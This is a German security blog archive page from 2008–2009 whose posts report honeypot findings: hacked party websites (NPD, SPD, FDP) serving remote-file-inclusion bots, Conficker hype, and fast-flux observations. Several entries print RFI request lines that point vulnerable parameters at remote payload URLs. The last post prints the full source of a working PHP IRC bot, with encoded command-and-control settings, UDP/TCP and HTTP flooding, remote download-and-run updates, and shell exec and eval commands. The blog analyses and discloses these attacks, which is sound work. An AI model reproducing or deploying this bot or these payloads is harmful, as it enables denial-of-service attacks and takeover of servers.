blog.grospolina.net - malware

"malware" - Was ist das eigentlich?

nospam@example.com (katsumi) — Mon, 19 Oct 2009 07:59:24 +0200

Wegen des Löschwahns
bin ich auf eine interessante Seite gestossen,
die Euch endlich mal die Malware erklärt.
Dieser Artikel ist NICHT eineindeutig schnelllöschfähig!

NPD Nordhausen hacked

nospam@example.com (katsumi) — Mon, 24 Aug 2009 19:08:04 +0200

Webpräsenz des Kreisverbandes Nordhausen der NPD von Indonesiern übernommen

Für die Serie "gehackte Parteienhomepages" hat sich erfolgreich die NPD beworben.
Ein bösliches Individuum namens "Anggun Pradesi" aus Indonesien benutzt derzeit
die Homepage der NPD Nordhausen als Verteiler für bots.
Nachdem ich ja schon die FDP und die SPD zwischen hatte,
muss ich, weil ich ja unpolitisch bin, natürlich auch über diesen Fund auf unseren honeypots berichten.
Freundlicherweise können wir uns den Index anzeigen lassen.

playmobile$ wget http://www.npd-nordhausen.de/files//redaxo/
--20:02:12--  http://www.npd-nordhausen.de/files//redaxo/
           => `index.html'
Resolving www.npd-nordhausen.de... 83.243.58.156
Connecting to www.npd-nordhausen.de|83.243.58.156|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 543 [text/html]
CODE:
playmobile$ cat index.html
....
<h1>Index of /files//redaxo</h1>
<ul><li><a href="http://blog.grospolina.net/files//"> Parent Directory</a></li>
<li><a href="ade.txt"> ade.txt</a></li>
<li><a href="admin/"> admin/</a></li>
<li><a href="idade1.txt"> idade1.txt</a></li>
<li><a href="idade2.txt"> idade2.txt</a></li>
<li><a href="includes/"> includes/</a></li>
<li><a href="index.txt"> index.txt</a></li>
<li><a href="topmenu.php"> topmenu.php</a></li>
....
playmobile$ wget http://www.npd-nordhausen.de/files//redaxo/index.txt
--18:54:28--  http://www.npd-nordhausen.de/files//redaxo/index.txt
           => `index.txt'
Resolving www.npd-nordhausen.de... 83.243.58.156
Connecting to www.npd-nordhausen.de|83.243.58.156|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,558 (4.5K) [text/plain]

playmobile$ wget http://www.npd-nordhausen.de/files//redaxo/ade.txt
--18:52:56--  http://www.npd-nordhausen.de/files//redaxo/ade.txt
           => `ade.txt'
Resolving www.npd-nordhausen.de... 83.243.58.156
Connecting to www.npd-nordhausen.de|83.243.58.156|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 53,181 (52K) [text/plain]

playmobile$ wget http://www.npd-nordhausen.de/files//redaxo/idade1.txt
--18:53:40--  http://www.npd-nordhausen.de/files//redaxo/idade1.txt
           => `idade1.txt'
Resolving www.npd-nordhausen.de... 83.243.58.156
Connecting to www.npd-nordhausen.de|83.243.58.156|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 75 [text/plain]

playmobile$ wget http://www.npd-nordhausen.de/files//redaxo/idade2.txt
--18:53:47--  http://www.npd-nordhausen.de/files//redaxo/idade2.txt
           => `idade2.txt'
Resolving www.npd-nordhausen.de... 83.243.58.156
Connecting to www.npd-nordhausen.de|83.243.58.156|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,160 (2.1K) [text/plain]

Continue reading "NPD Nordhausen hacked"

Mehr FastFlux Graphiken

nospam@example.com (katsumi) — Wed, 10 Jun 2009 09:35:14 +0200

Ich will euch hier mal einen kleinen Nachtrag bezüglich FastFlux in Form von ein paar Graphiken,
die ich von robtex.com "ausgeschnitten" habe, bieten.
Ich lasse diese mal unkommentiert:

loveliveportal.com shared

18.82.8.163 shared

Alle Graphiken sind nur Momentaufnahmen.
Ich hoffe ihr findet diese interessant!

Continue reading "Mehr FastFlux Graphiken"

Conficker_Hype - nächster Teil (#2)

nospam@example.com (katsumi) — Fri, 10 Apr 2009 14:12:56 +0200

Teil2:
Fortsetzung von: http://blog.grospolina.net/archives/43-Conficker_Hype-naechster-Teil-1.html
Robtex kann tolle Grafiken machen.
...inwieweit man den Grafiken und den Daten allgemein vertrauen kann, sei einmal dahingestellt.
Ich hab mir abgewöhnt weiter mails an solche Leute zu schreiben, ein Hinweis sollte reichen,
wie sich die Einträge in der robtex db durch nicht RFC konforme Nameserver beeinflussen lassen.
Nun aber die Bildchen:

Cambridge FastFlux1

Dort wollten wir aber gar nicht hin? Wir wollten doch über...
Wiedem auch sei, das hier ist eine ebenfalls schicke Grafik eines Knoten im Netzes:
wapcity

Insgesamt sieht das Netz dort sehr fein aus, da muss man mit der Zunge schnalzen ;)
Aber im allgemeinen kann ich nicht verstehen, warum 6 Nameserver benutzt werden.
Der freundliche Herr Euler sagt, wenn wir stattdessen nur 5 benutzen,
würden wir keine Pfade mehr haben, die ins Leere laufen.
Sofern praktisch alle benutzten IPs miteinander Brücken bauen mit Hilfe dieser lustigen NS-Rekursion,
in derer immer 6 neue Nameserver in der Zone sind, wobei das parent in der Delegation vermisst wird,
ich meine ich bin ja kein Mathematiker, aber ich halte das für einen Schwachpunkt dieses Netzes.
UND? Was ist jetzt passiert?
Ich schreib hier wirres Zeug über Königsberg und habe dabei vergessen,
was hier in der Überschrift steht.
Die lachen sich währenddessen mit Sicherheit kaputt über die Experten.
Alle forschen fleissig.
Leute, das ist business, die ganze Struktur ist nicht nur einem genialen Kopf entsprungen,
der mit Sicherheit viel Geld dafür kassiert hat, sondern vielen, die sich mehr oder weniger kennen, vielleicht gar nicht.
Wenn die Experten sich Personen hinter den Zweigen dessen, was sie als Verzweigung vermuten, vorstellen könnten,
dann könnten sich diese eventuell irgendwann mal ein Bild davon machen.
Wenn auch nur IHR Bild.
Ausserdem kann solch ein Projekt durchaus durch Eigendynamik beeinflusst werden,
und wenn ich selber nicht sagen kann, warum das nun so funktioniert hat,
aber wenn ich mich an gewisse Regeln und Vorgehensweisen halte,
wodurch dies reproduzierbar bleibt, und die Experten immer nur analysieren, was sie bekommen,
dann brauche ich mir niemals Sorgen zu machen, dass die "Experten der Analyse" auch jemals eine Struktur nur erahnen könnten.

und deshalb sagt kat:
Abschalten ;)

Conficker_Hype - nächster Teil (#1)

nospam@example.com (katsumi) — Fri, 10 Apr 2009 10:53:00 +0200

Tja, da gehen die sog. Experten hin und registrieren sich domains die der Conficker-Wurm anlegen wird,
um ein Update zu Verhindern, was ja eh aussichtlos erscheinen musste,
und dann geht der sucker hin und macht etwas vollkommen anderes.
Jede noch so falsche Information wird in diesen hype verwertet.
Bei den AVs, in den weblogs und .. überall.
Hat sich denn jemand mal die Mühe gemacht das gegenzuprüfen?
Nein? ...und der Rest der schreibenden Zunft macht was?
Abschreiben?
Nehmen wir einmal den Artikel auf Heise Security:
http://www.heise.de/security/Conficker-Wurm-laedt-jetzt-doch-nach--/news/meldung/136005
Dort beginnt es so: "Nach Angaben von..."
und das der Wurm aus Korea nachgeladen hat.
Dort wird verwiesen auf http://blog.trendmicro.com/downadconficker-watch-new-variant-in-the-mix/
und
http://countermeasures.trendmicro.eu/new-downadconficker-variant-spreading-over-p2p/
Aha.
Was lesen wir da?
Oh, unser sucker lädt auch eine Datei namens "fuck4.exe" von goodnewsdigital.com ?
Die erste Ip die mir angeboten wurde war tatsächlich in Korea beherbergt.
Mir ist aber auch gelungen, das "Massachusets Institut of Technology" damit in Verbindung zu bringen.
Wie das kann?

Continue reading "Conficker_Hype - nächster Teil (#1)"

Conficker legt Teile asiatischer Netze lahm [Update]

nospam@example.com (katsumi) — Wed, 01 Apr 2009 15:50:40 +0200

Scheinbar hat der hype um den Conficker-Wurm gefruchtet.
Es konnten, wie Experten,wie etwa Tillmann Werner uns mit Informationen versorgt hat,
berichten, dass nur wenige Updates im Verhältnis zur Grösse des Netzes ausgeführt werden.

Speziell das Internet Storm Center beschäftigt sich seit einiger Zeit mit diesem Wurm.
Es konnten massive Angriffsversuche auf sogenannte Border Gateways der Autonomen Systeme (AS)
im asiatischen Raum beobachtet werden.
Die Angriffe obliegen dem Border Gateway Protocol (BGP),
welches auf Port 179 sowohl als TCP und UDP - Port horcht.
Der Wurm versucht auf nicht gesicherten Routern fehlerhafte Routen beizufügen,
womit es möglich ist, auch Netze auf anderen Kontinenten erheblich zu stören.
Falls die Aktivitäten weiter ansteigen,
haben wir mit einigen Teilausfällen grosser Provider in den nächsten Stunden zu rechnen.

Update: Es scheinen grosse Teile Chinas und Korea betroffen zu sein,
allerdings war auch das komplette Netz von honeynet.cz durch einen fehlkonfigurierten Router in Tschechien betroffen.

Update:

Der 1. April ist vorrüber, aber was ist mit dem "Conficker_Hype"?

kat sagt:
"Abschalten!" ;)

[glastopf] uni-bs.de & 134.*

nospam@example.com (katsumi) — Fri, 06 Mar 2009 03:56:04 +0100

Ich teste grade ein paar Suchen für das WI vom glastopf...
Gerade fertig geworden ist die Suche nach IPs.
Dort habe ich mal "134* " eingegeben...
..und auf Grund andauernder Ignoranz, werde ich ab und zu mal was veröffentlichen.
Die Technische Universität Braunschweig mit ihrer Präsenz als "tu-bs.de"
erwies sich als abuse-mail resistent.
...öhm..neee... da ist ja gar keine addy angegeben wo man sein abuse kram hinschicken kann..??
Dolce Far Niente :p

IP  	134.169.6.100
Domain 	rzv100.rz.tu-bs.de
Time 	2009-03-03 11:57:27
Request 	/order/login.php?svr_rootscript=http://www.culturaemacao.art.br/web/alb??
File 	da1e4c6b6f575e70c6a0a00a839a9c74
Count 	5
Compromised 	culturaemacao.art.br
Attacks from IP 	3

IP  	134.169.6.60
Domain 	rzv060.rz.tu-bs.de
Time 	2009-02-24 11:08:41
Request 	//poll/png.php?include_path=http://geocities.com/mala23173/bajo-spread.txt??
File 	e7351a69f86ec138ef3e018891f6ce4a
Count 	2
Compromised 	geocities.com
Attacks from IP 	47

IP  	134.106.40.151
Domain 	websrv01.uni-oldenburg.de
Time 	2009-02-23 01:47:08
Request //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.kbmaeil.com/kboard/test.txt??
File 	4e3f79cee97fc7404bc0b65abb77f80d
Count 	1
Compromised 	kbmaeil.com
Attacks from IP  	7

IP  	134.173.238.144
Domain 	134.173.238.144
Time 	2009-03-03 08:46:54
Request /index.php?redir=http://mebelbox.home.pl/flash/elite/safe1.txt???
File 	6f223436a4a4ea9b64474a04afa9a9b2
Count 	3
Compromised 	mebelbox.home.pl
Attacks from IP 	94

[malware]Webauftritt des SPD Ortsverbandes Esens verteilt immer noch pbots

nospam@example.com (katsumi) — Thu, 11 Dec 2008 02:07:18 +0100

In dem Artikel vom 12.Oktober 2008 könnt Ihr lesen,
dass die Webseite des SPD Ortsverbandes Esens gehackt wurde.
Heute, am 11. Dezember sieht es nicht besser aus.
NIEMANDen interessiert, was dort auf der Seite zum Herunterladen abgelegt wurde!
Doch! Mich interessiert es!

Continue reading "[malware]Webauftritt des SPD Ortsverbandes Esens verteilt immer noch pbots"

Holz aus Brasilien - this is fuckin cr4nk

nospam@example.com (katsumi) — Mon, 24 Nov 2008 09:03:43 +0100

Nachdem ich den freundlichen Kommentar von haterbreed entdeckt hatte,
habe ich einmal die gleiche Google-Suche gestartet, wie er es tat.
Neben meinem blog hier gabs auch noch andere Ergebnisse,
wie zum Beispiel diesen:
google cache von brasilwood.eu
Falls der Cache nicht mehr die ersetzte Seite zeigt,
habe ich hier einmal nen screenshot hinterlegt:

Klicken zum Vergrössern!

Continue reading "Holz aus Brasilien - this is fuckin cr4nk"

Crank - this is fuckin cr4nk

nospam@example.com (katsumi) — Thu, 06 Nov 2008 17:36:24 +0100

Ich dachte wirklich zunächst, "cr4nk" wäre mal eine etwas anderes Volk...

Continue reading "Crank - this is fuckin cr4nk"

Webseite des SPD Ortsverbandes Esens-Nord gehackt

nospam@example.com (katsumi) — Sun, 12 Oct 2008 12:06:37 +0200

Damit mir nicht jemand vorwirft ich sei politisch,
veröffentliche ich hier einmal den Link zum responsefile,
das Teil eines Angriffes auf eine meiner domains war:
(...auch die SPD hilft beim Verteilen von RFI/LFI/SQLI bots)

http://spd-esens.de/spd/contentimage/bid.txt

Oder ist sowas nur interessant, wenn es beim jährlichen CCC Treffen passiert?

Continue reading "Webseite des SPD Ortsverbandes Esens-Nord gehackt"

onspeed.com als Beschleuniger für hacker

nospam@example.com (katsumi) — Fri, 03 Oct 2008 16:44:50 +0200

onspeed.com ist laut deren Webseite ein Dienst,
der langsame Verbindungen beim browsen beschleunigen soll.
Wenn ich dies richtig verstanden habe,
bekommt man für knapp 25 Dollars Zugang zu einem Service,
der Browseranfragen aus einem Cache mit gepackten Daten beantwortet. (deflate)
Ebenso ist es aber dadurch möglich,
RFI scans mit einer ziemlich hohen Geschwindigkeit durchzuführen.
Das soll jetzt keine Werbung sein.
Ich meine das ernst.
onspeed hat bisher nicht auf meine mails geantwortet,
daher nun meine Empfehlung an alle Admins, Hostmaster und was immer folgende domains/IPs zu blocken:

Stand  3.10.2008 17:05
domain                              IP
---------------------------------------------------------
navaho.onspeed.com  	72.3.137.82
yuma.onspeed.com 	72.3.137.83
vanadium.onspeed.com 	83.138.172.72
chromium.onspeed.com 	83.138.172.76
silicon.onspeed.com 	 212.100.250.218
sulphur.onspeed.com 	212.100.250.225
aluminium.onspeed.com 	 212.100.250.217
nickel.onspeed.com     212.100.250.230

Ich persönlich habe kein Problem damit etwas grosszügiger zu sein:

72.3.137.0/24
83.138.172.0/24
212.100.250.0/24

Hier ein Auszug aus der abuse mail:

Continue reading "onspeed.com als Beschleuniger für hacker"

[honeyd] rfi - listen

nospam@example.com (katsumi) — Sat, 13 Sep 2008 09:32:05 +0200

Der Andrang ist inzwischen so gross geworden, mich zum Opfer zu machen,
sodass ich während ich Skripte versuche zu erstellen,
die Situation sich schon wieder dermassen geändert hat,
dass ich das Konzept wieder neu überdenken muss ;)

Continue reading "[honeyd] rfi - listen"

[malware] fdp.de gehackt?

nospam@example.com (katsumi) — Wed, 20 Aug 2008 07:54:16 +0200

Scheinbar ist die fdp.de Webseite Opfer einer RFI Attacke geworden.
In der letzten Zusammenfassung des tschechischen Honeynet Projektes fiel ein Eintrag auf:
Bericht vom 20.August 2008

STATISTIKA PRO RFI/XSS - MALWARE

Link na malware - pocet IP - pocet utoku
http://fdp.de/vorschaltseite/did.txt - 31 - 94 - 6a608609c0535feef25f60325d2e40cb

und noch ein zweiter:

http://fdp.de/vorschaltseite/id.txt - 58 - 249 - 9e816808f1debe9ebeecb08654c2d5c2

Im Bericht vom Vortag finden sich folgende Einträge:

http://fdp.de/vorschaltseite/did.txt - 3 - 6 - 6a608609c0535feef25f60325d2e40cb
http://fdp.de/vorschaltseite/id.txt - 28 - 163 - 9e816808f1debe9ebeecb08654c2d5c2

Im Bericht vom 17. August taucht die Adresse das erstemal auf:

http://fdp.de/vorschaltseite/did.txt - 7 - 18 - 6a608609c0535feef25f60325d2e40cb

Eine google-Suche nach fdp.de/vorschaltseite gibt uns Gewissheit.
Beispiele:
http://forums.oscommerce.de/index.php?showtopic=64731&view=getlastpost

00:00:00 libwww-perl artmam.com 13:12:02 /index.php?custompluginfile[]=http://fdp. de/vorschaltseite/id.txt

http://infolac.ucol.mx/access/

pbb_root_path=http://fdp.de/vorschaltseite/id.txt?

Obwohl die Dateie(en) nicht mehr auf der FDP Vorschaltseite zu finden sind,
können wir trotzdem einen Blick darauf werfen:

Continue reading "[malware] fdp.de gehackt?"

[malware] RFI Attacken mit Hilfe von pastebin.ubuntu.com

nospam@example.com (katsumi) — Sat, 09 Aug 2008 16:57:40 +0200

Ob ubuntu Eure bevorzugte Distribution ist, sei einmal dahingestellt.
Offensichtlich wird jedoch der pastebin im "plain" dafür ausgenutzt webseiten zu übernehmen.

CODE:

cat rfi.txt |grep pastebin /doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33902/plain/??? /doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33897/plain/? /doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33924/plain/? /doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33924/plain/ /doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33946/plain/? /doc///vwar/backup/errors.php?error=http://pastebin.ubuntu.com/35446/plain/???

Schauen wir uns einmal diesen letzten "pastebin" an:

CODE:

<?php ignore_user_abort(TRUE); set_time_limit(0); error_reporting(E_ALL); class bMain { var $config = array( // "prefix" => "HOMOVAN|", "maxnumbers" => 5, "maxident" => 6, "trigger" => ".", "modes" => "-ix", "adminhosts" => array("i.love.ircsluts.net"), "sockbuffer" => 512, "rejoindelay" => 900, "cpingdelay" => 10, "chessburstudp" => 5000, "chessbursttcp" => 100, "httpburst" => 20, ); var $servers = array( array( "host" => "Y2FydGVyLndpZ2d5bmV0Lm9yZy51aw==", "port" => "OTAwMA==", "channels" => array("I21vYmZpZ2dh"), "control" => true, ), ); var $bots = array(); var $lastrejointime; function bMain() { $this->lastrejointime = time(); } function start() { foreach ($this->servers as $srv) { $bot = new bBot; $bot->setnick($this->generatenick()); $bot->setcontrol($srv["control"]); foreach ($srv["channels"] as $chan) $bot->channels[] = base64_decode($chan); $bot->setdestination(base64_decode($srv["host"]),base64_decode($srv["port"]),$this->generateident()); $bot->lastreconnect = time(); $bot->connect(); $this->bots[] = $bot; } while (1) $this->heartbeat(); } function heartbeat() { if (time()-$this->lastrejointime >= $this->config["rejoindelay"]) { $this->lastrejointime = time(); $botcnt = count($this->bots); for ($i=0; $i<$botcnt; $i++) $this->bots[$i]->joinchans(); } foreach ($this->bots as $botlol) { if ($botlol->isconnected()) $botlol->parsebuffer(); elseif (time()-10 > $botlol->lastreconnect) { /* $botlol->lastreconnect = time(); $botlol->setnick($this->generatenick()); $botlol->connect();*/ exit(); } } } function generatenick() { /* $randnick = $this->config["prefix"]; for ($i=0;$i<$this->config["maxnumbers"];$i++) $randnick .= mt_rand(0,9); return $randnick;*/ $nprefixes = array("Wolf","Wolfeh","Wolfy","Dog","Doggy","Doggy","Cheetah","Yiff","Yiffy","Lion","Lioness","Tiger","Tigah","Aardvark","Badger","Beaver","Cat","Kitty","Deer","Donkey","Donkeh","Bear","Grizzly","Hamster","Pikachu","Mudkip","Goat","Coyote","Flame","Mustang","Lynx","Stallion","Tapir","Panda","Pony","Bunny","Dawg","Inu","Neko","Usagi","Kitsune","Kitune","Tails","Horny","Kinky","Yiffy","Sexy","Manly","Female","Horneh","Sex","Sxc","Flame","Viper","Fire","Desu","Angry","Happy","Playful","Naughty","Good","Speed","Snow","Beach","Windy","Dream","Dreamer","Afro","Skritchy","Lovely","Sonic"); $newnick = $nprefixes[array_rand($nprefixes)].$nprefixes[array_rand($nprefixes)]; for ($i=0; $i<mt_rand(1,$this->config["maxnumbers"]); $i++) $newnick .= mt_rand(0,9); return strtolower($newnick); } function generateident() { $alph = range("a","z"); $randident = ""; for($i = 0;$i<$this->config["maxident"];$i++) $randident .= $alph[rand(0,25)]; return $randident; } function activeconnections() { $concount = 0; foreach ($this->bots as $bot) { if ($bot->isconnected()) $concount++; } return $concount; } function startchess($t, $h, $p, $ps, $ti) { /* if (strlen($this->chessfile) < 1) $this->chessfile = $this->createchessfile(); $this->spawnfakethreads("php ".$this->chessfile." ".base64_encode($h)." ".base64_encode($p)." ".base64_encode($ps)." ".base64_encode($t), intval($th));*/ $ho = ""; if ($t == "udp") { $burst = $this->config["chessburstudp"]; $ho = "udp://"; //print("using udp $burst\n"); } elseif ($t == "tcp") { $burst = $this->config["chessbursttcp"]; $ho = "tcp://"; //print("using tcp $burst\n"); } //else print("else $t\n"); $ho .= $h; $lastping = 0; $out = ""; for($i=0;$i<$ps;$i++) $out .= chr(mt_rand(1, 256)); $i = 0; $pakcnt = 0; $timei = time(); while (1) { if ($p < 1 || $p > 65000) $po = mt_rand(1,65000); else $po = $p; @$fp = fsockopen($ho, $po, $errno, $errstr, 1); if ($fp) { fwrite($fp, $out); fclose($fp); } $i++; if ($i >= $burst) { $ctime = time(); if ($ctime - $lastping >= $this->config["cpingdelay"]) { foreach ($this->bots as $botlol) { $botlol->raw("PING"); } $lastping = $ctime; } $pakcnt += $i; if ($ctime - $timei >= $ti) return $pakcnt; else $i = 0; } } } function starthttp($url, $secs) { $agents = array( "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.4/Megaupload x.0", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20030306 Camino/0.7", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0", "Opera/9.50 (Windows NT 5.1; U; en-GB)", "Opera/9.50 (Windows NT 5.1; U; en-US)", ); $parsed = parse_url($url); if (!$parsed) return false; $servip = gethostbyname($parsed['host']); if (!$parsed['query']) $parsed['query'] = ""; $lastping = 0; $i = 0; $reqcnt = 0; $timei = time(); while (1) { if ($sock = fsockopen($servip, 80, $errno, $errstr, 1)) { $packet = "GET ".$parsed['path']."?".$parsed['query']." HTTP/1.1\r\n" . "User-Agent: ".$agents[array_rand($agents)]."\r\n" . "Host: ".$parsed['host']."\r\n" . "Connection: Keep-Alive\r\n\r\n"; fwrite($sock, $packet); fclose($sock); } $i++; if ($i >= $this->config["httpburst"]) { $ctime = time(); if ($ctime-$lastping >= $this->config["cpingdelay"]) { foreach ($this->bots as $botlol) { $botlol->raw("PING"); } $lastping = $ctime; } $reqcnt += $i; if ($ctime - $timei >= $secs) return $reqcnt; else $i = 0; } } } /* function spawnfakethreads($cmd, $qty) { if (stristr(PHP_OS, "WIN")) $fullcmd = "start $cmd"; else $fullcmd = "$cmd > /dev/null 2>&1 &"; for ($i=0; $i<$qty; $i++) { shell_exec($fullcmd); } }*/ function update($url, $killprocess, $runcmd, $sourcebot, $source) { //$starttime = time(); $updcode = file_get_contents($url); if ($updcode) $sourcebot->say("Got ".strlen($updcode)." bytes", $source); else return false; //$destfile = $this->randtempfile(); $destfile = tempnam("/tmp", "pdata"); $fh = fopen($destfile, "w"); fwrite($fh, $updcode); fclose($fh); $this->spawnfakethreads($runcmd." ".$destfile, 1); unlink($destfile); if ($killprocess = 1) die("Updating"); } /* function createchessfile() { $tmpfile = tempnam("datab", "/tmp"); $fh = fopen($tmpfile, "w"); fwrite($fh, base64_decode($this->csrc)); fclose($fh); return $tmpfile; }*/ } class bBot { var $currenthost; var $currentport; var $currentident; var $currentnick = "unset"; var $channels = array(); var $allowcontrol = false; var $socket; var $lastreconnect; function setdestination($host, $port, $ident) { $this->currenthost = $host; $this->currentport = $port; $this->currentident = $ident; } function connect() { $this->socket = fsockopen($this->currenthost, $this->currentport, $errno, $errstr, 5); if (feof($this->socket)) { print("connection error: $errstr [$errno]\n"); return false; } stream_set_blocking($this->socket, 0); $this->raw("USER ".$this->currentident." 127.0.0.1 localhost :".php_uname().""); $this->raw("NICK ".$this->currentnick); return true; } function disconnect() { $this->raw("QUIT :Disconnecting"); fclose($this->socket); } function setnick($nick, $set = false) { if ($set) $this->raw("NICK $nick"); $this->currentnick = $nick; } function setcontrol($control) { $this->allowcontrol = $control; } function joinchans() { foreach ($this->channels as $chan) $this->raw("JOIN $chan"); } function raw($text) { fwrite($this->socket, $text."\r\n"); } function say($text, $target, $notice = false) { if (!$notice) $this->raw("PRIVMSG $target :$text"); else $this->raw("NOTICE $target :$text"); } function isconnected() { if ($this->socket && !feof($this->socket)) return true; else return false; } function parsebuffer() { global $mainclass; $buf = trim(fgets($this->socket, $mainclass->config["sockbuffer"])); if (!$buf || strlen($buf) < 3) { usleep(100000); return false; } if (substr($buf,0,6) == "PING :") $this->raw("PONG :".substr($buf,6)); $cmd = explode(" ", $buf); if (isset($cmd[1])) { switch ($cmd[1]) { case "001": $this->raw("MODE ".$this->currentnick." :".$mainclass->config["modes"]); $this->joinchans(); break; case "433": $this->raw("NICK {$this->currentnick}"); break; case "PRIVMSG": if (!$this->allowcontrol) break; $host = explode("@", $cmd[0]); $text = substr($cmd[3], 1); for ($i=4; $i<1024; $i++) { if (isset($cmd[$i])) $text .= " ".$cmd[$i]; else break; } if (substr($text, 0, 1) == $mainclass->config["trigger"]) { $textnoprefix = substr($text, 1); $textsplit = explode(" ", $textnoprefix); //if ($host[1] == $mainclass->config["adminhost"]) $this->parsecommand($textsplit, $cmd[2], $cmd[0]); foreach ($mainclass->config["adminhosts"] as $admhost) { if (stristr($host[1], $admhost)) { $this->parsecommand($textsplit, $cmd[2], $cmd[0]); break; } } } break; case "KICK": if ($cmd[3] == $this->currentnick) $this->joinchans(); break; } } } function parsecommand($args, $source, $hostname = "") { global $mainclass; $numargs = count($args)-1; switch ($args[0]) { // ADMIN COMMANDS GO HERE case "test": $this->say("hello", $source); break; case "status": $this->say("Connected to ".$mainclass->activeconnections()." server(s).", $source); break; case "info": if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; } else { $safemode = "off"; } $uname = php_uname(); $this->say("$uname (safe: $safemode)", $source); if ($_SERVER['SERVER_NAME'] && $_SERVER['REQUEST_URI']) $this->say("http://" . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . "", $source); break; case "die": $this->raw("QUIT :Die command received from $source"); die(); break; case "chess": if ($numargs < 5) { $this->say("Usage: ".$mainclass->config["trigger"]."chess [type (tcp/udp)] [host] [port] [bytes] [secs]", $source); break; } if ($args[1] != "tcp" && $args[1] != "udp") { $this->say("Invalid type specified", $source); break; } $this->say("Chess starting", $source); $psizeint = intval($args[4]); $secsint = intval($args[5]); $pakits = $mainclass->startchess($args[1], $args[2], intval($args[3]), $psizeint, $secsint); $mbsent = round(($psizeint*$pakits)/1048576, 2); $this->say("Chess finished (".$args[1].") - host: ".$args[2].":".$args[3].", psize: ".$args[4].", secs: ".$args[5].", sent: ".$mbsent." megabytes at ".round($mbsent/$secsint, 2)." mb/s", $source); break; /* case "stopchess": if ($mainclass->chessrunning) $this->say("Stopping chess!", $source); else $this->say("You're not playing chess you asshat", $source); $mainclass->stopchess = true; break;*/ case "update": if ($numargs < 3) { $this->say("Usage: ".$mainclass->config["trigger"]."update [url] [run with] [kill this process (0/1)]", $source); break; } $this->say("Starting update download...", $source); if (!$mainclass->update($args[1], $args[2], intval($args[3]), $this, $source)) $this->say("Error downloading file, aborting.", $source); break; case "connections": foreach ($mainclass->bots as $botid => $botlol) if ($botlol->isconnected()) $this->say("(\2".$botid."\2) ".$botlol->currenthost.":".$botlol->currentport." - ".$botlol->currentnick, $source); break; case "connect": if ($numargs < 5) { $this->say("Usage: ".$mainclass->config["trigger"]."connect [host] [port] [nick (0=rand)] [channels (,)] [control (0,1)]", $source); break; } $this->say("Connecting to ".$args[1]."...", $source); $newbot = new bBot; if ($args[3] != "0") $newbot->setnick($args[3]); else $newbot->setnick($mainclass->generatenick()); if ($args[5] == "1") $newbot->setcontrol(true); else $newbot->setcontrol(false); $newchannels = explode(",", $args[4]); foreach ($newchannels as $newchan) $newbot->channels[] = $newchan; $newbot->setdestination($args[1],$args[2],$mainclass->generateident()); $newbot->connect(); if ($newbot->isconnected()) { $mainclass->bots[] = $newbot; $this->say("Connection successful, use "disconnect" to disconnect.", $source); } else $this->say("Connection error!", $source); break; case "disconnect": if ($numargs < 1) { $this->say("Usage: ".$mainclass->config["trigger"]."disconnect [conid]", $source); break; } $conid = intval($args[1]); if (strlen($args[1]) > 2 || !$mainclass->bots[$conid]) { $this->say("Invalid connection ID", $source); break; } if ($mainclass->bots[$conid]->allowcontrol) { $ctrlbots = 0; foreach ($mainclass->bots as $bawt) { if ($bawt->allowcontrol) $ctrlbots++; } if ($ctrlbots <= 1) { $this->say("Cannot disconnect while only one control connection remaining, use "die"", $source); break; } } if (count($mainclass->bots) <= 1) { $this->raw("QUIT :Final connection dropped, quitting"); die(); break; } if ($mainclass->bots[$conid]) { $mainclass->bots[$conid]->disconnect(); unset($mainclass->bots[$conid]); sort($mainclass->bots); $this->say("Connection ".$args[1]." disconnected", $source); } else $this->say("Invalid connection ID", $source); break; case "exec": $txt = ""; for ($i=1; $i<1024; $i++) { if (isset($args[$i])) $txt .= $args[$i]." "; else break; } $ph = popen($txt." 2>&1", "r"); $read = fread($ph, 8192); $out = explode("\n", $read); pclose($ph); foreach ($out as $line) { $this->say(trim($line), $source); //sleep(1); } break; case "eval": ob_start(); eval($args); $outa = explode("\n", ob_get_flush()); foreach ($outa as $line) { $this->say(trim($line), $source); //sleep(1); } ob_end_flush(); break; case "http": if ($numargs < 2) { $this->say("Usage: ".$mainclass->config["trigger"]."http [url] [secs]", $source); break; } $this->say("HTTP request flood starting", $source); $requests = $mainclass->starthttp($args[1], intval($args[2])); if ($requests && $requests > 0) $this->say("HTTP flood finished - sent ".$requests." requests", $source); else $this->say("HTTP flood error, no requests sent", $source); break; } } } $mainclass = new bMain; $mainclass->start(); ?>

interessant die base 64 Kodierung der server und channel Variablen.